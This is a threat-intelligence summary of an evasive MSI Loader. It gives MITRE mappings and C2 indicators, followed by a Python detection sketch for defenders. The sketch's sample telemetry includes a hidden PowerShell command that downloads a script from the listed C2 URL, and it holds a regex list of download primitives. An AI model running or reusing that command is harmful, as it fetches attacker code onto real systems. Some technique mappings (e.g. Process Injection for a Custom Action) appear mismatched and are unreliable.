Cyfirma researchers uncover a stealthy MSI Loader advertised by a Russian threat actor that evades VirusTotal and Windows Defender, with ties to the BatLoader campaign and use of AnyDesk for concealment. The report details its deployment, cross-border victimology (500+ victims across several countries), and a C2 panel that even allows deleting infected Russian systems, signaling coordinated, multifaceted threat activity.
Key points
- The loader evades both Windows Defender runtime scans and VirusTotal, making detection difficult.
- In examined samples, the loader disguises itself as a .NET Framework setup and uses AnyDesk to conceal deployments.
- Technical patterns and infrastructure show similarities with the BatLoader campaign from March 2023, suggesting coordination.
- The demo panel indicates over 500 compromised victims across the US, UK, Germany, Australia, Korea, Canada, and the Netherlands.
- The loader’s C2 panel includes a capability to delete infected systems in Russia, reflecting underground community practices to protect their own infrastructure.
- The MSI uses a Custom Action to run a PowerShell downloader, relies on libraries bundled by Advanced Installer, and pulls its payloads from remote URLs.
MITRE Techniques
- [T1055] Process Injection – The threat actor is leveraging the Custom Action feature of the MSI package format to execute the PowerShell script. Quote: “The threat actor is leveraging the Custom Action feature of the MSI package format to execute the PowerShell script.”
- [T1497] Sandbox Evasion – Evades detection by Windows Defender runtime scans and VirusTotal, enabling stealthy operation. Quote: “The Loader’s evasion capabilities extend to both Windows Defender runtime scans and VT scans, allowing it to avoid detection effectively.”
- [T1012] Query Registry – Discovery-related activity noted as part of system reconnaissance. Quote: “Query Registry.”
- [T1057] Process Discovery – Discovery of running processes as part of environment enumeration. Quote: “Process Discovery.”
- [T1082] System Information Discovery – Collecting information about the host system. Quote: “System Information Discovery.”
- [T1083] File and Directory Discovery – Locating files and directories as part of the attack footprint. Quote: “File and Directory Discovery.”
- [T1124] System Time Discovery – Determining system time to coordinate actions. Quote: “System Time Discovery.”
- [T1105] Remote File Copy – The loader downloads payloads from remote servers, enabling staged delivery. Quote: “Remote File Copy.”
- [T1533] Data from Local System – Exfiltration or collection of data from the host. Quote: “Data from Local System.”
- [T1485] Data Destruction – Capabilities to destroy data as part of impact. Quote: “Data Destruction.”
- [T1106] Execution through API – Execution via API calls, including PowerShell execution via MSI Custom Action. Quote: “Execution through API.”
Indicators of Compromise
- [Domain] panelnew.ru, midj-ai.store – Domains used for command-and-control
- [URL] https://midj-ai.store/install.php, https://midj-ai.store/start.php – C2 URLs
- [Loader] 0d2d40a2b4842722dab9c4a5fd160ea0c88503508548a9a55e02e58160475388 – SHA-256 hash of a loader sample
- [Loader] aa8eff63835e5d1172d0a84bfd7703c5ac1c4ee63e6e0b5d700ea8c5e3814ca0 – SHA-256 hash of a loader sample
- [IP] 195.161.62.30, 81.177.165.87, 81.177.135.244 – Contacted IP addresses used in infrastructure
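As an added illustration (not code from the CYFIRMA report), the Python sketch below turns the Custom Action behaviour described in the key points and the indicators listed above into a defender-side check over EDR-style process-creation and network events: msiexec.exe spawning PowerShell with a download primitive, plus contact with the listed domains and IPs. The event field names and the sample telemetry are assumptions constructed for this example; only the domains and IPs come from the page.

```python
import re
# Domains and IPs are the ones listed in the report's indicator section on this page.
KNOWN_C2_DOMAINS = {"panelnew.ru", "midj-ai.store"}
KNOWN_C2_IPS = {"195.161.62.30", "81.177.165.87", "81.177.135.244"}
# Download primitives a PowerShell stage launched from an MSI Custom Action would typically use.
DOWNLOAD_PATTERNS = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)


def check_process_event(event):
    """Reasons a process-creation event (Sysmon event ID 1 style fields, assumed names) matches the loader chain."""
    reasons = []
    parent = event.get("parent_image", "").lower()
    image = event.get("image", "").lower()
    cmdline = event.get("command_line", "")
    # The report's MSI runs its downloader via a Custom Action, so msiexec.exe is the parent of PowerShell.
    if parent.endswith("msiexec.exe") and image.endswith(("powershell.exe", "pwsh.exe")):
        reasons.append("msiexec.exe spawned PowerShell (MSI Custom Action)")
        if DOWNLOAD_PATTERNS.search(cmdline):
            reasons.append("PowerShell command line contains a download primitive")
    for host in sorted(KNOWN_C2_DOMAINS):
        if host in cmdline.lower():
            reasons.append(f"command line references known C2 domain {host}")
    return reasons


def check_network_event(event):
    """Reasons a network-connection event (Sysmon event ID 3 style fields, assumed names) touches known infrastructure."""
    reasons = []
    if event.get("dest_ip") in KNOWN_C2_IPS:
        reasons.append(f"connection to known C2 IP {event['dest_ip']}")
    if event.get("dest_host", "").lower() in KNOWN_C2_DOMAINS:
        reasons.append(f"connection to known C2 domain {event['dest_host'].lower()}")
    return reasons


def scan_events(events):
    """Run the matching check over each event; returns (event id, reason) pairs for every hit."""
    hits = []
    for ev in events:
        check = check_process_event if ev.get("type") == "process" else check_network_event
        hits.extend((ev["id"], reason) for reason in check(ev))
    return hits


# Constructed sample telemetry (not from the report): a loader-like chain, a benign PowerShell start, a C2 contact.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadString('https://midj-ai.store/start.php')\""},
    {"id": 2, "type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "powershell Get-Process"},
    {"id": 3, "type": "network", "dest_ip": "81.177.165.87", "dest_host": ""},
]
```

Calling `scan_events(SAMPLE_EVENTS)` yields three hits for event 1 and one for event 3; the benign PowerShell start in event 2 produces none.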